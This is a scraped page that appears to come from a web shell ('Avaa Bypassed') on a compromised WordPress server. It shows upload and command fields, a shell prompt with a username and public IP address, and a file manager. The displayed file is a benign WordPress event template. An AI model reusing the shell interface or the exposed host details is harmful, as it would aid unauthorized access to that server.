[ Avaa Bypassed ]




Upload:

Command:

hmhc3928@3.22.81.96: ~ $
<?php
/**
 * Template Single Event post type
 */
get_header();

/**
 * thim_wrapper_loop_start hook
 *
 * @hooked thim_wrapper_loop_end - 1
 * @hooked thim_wapper_page_title - 5
 * @hooked thim_wrapper_loop_start - 30
 */

do_action( 'thim_wrapper_loop_start' );

?>

<?php
/**
 * tp_event_before_main_content hook
 */
do_action( 'tp_event_before_main_content' );
?>

<?php while ( have_posts() ) : ?>
	<?php
	the_post();
	wpems_get_template_part( 'content', 'single-event' );
	?>
<?php endwhile; ?>

<?php

// If comments are open or we have at least one comment, load up the comment template
if ( comments_open() || '0' != get_comments_number() ) :
	comments_template();
endif;

?>


<?php

/**
 * hotel_booking_after_main_content hook
 *
 * @hooked tp_event_after_main_content - 10 (outputs closing divs for the content)
 */
do_action( 'tp_event_after_main_content' );

/**
 * thim_wrapper_loop_end hook
 *
 * @hooked thim_wrapper_loop_end - 10
 * @hooked thim_wrapper_div_close - 30
 */
do_action( 'thim_wrapper_loop_end' );

get_footer();

Filemanager

Name Type Size Permission Actions
loop Folder 0755
notices Folder 0755
shortcodes Folder 0755
archive-event.php File 3.28 KB 0644
content-event.php File 1.42 KB 0644
content-single-event.php File 4.1 KB 0644
events.php File 8.57 KB 0644
single-event.php File 1.02 KB 0644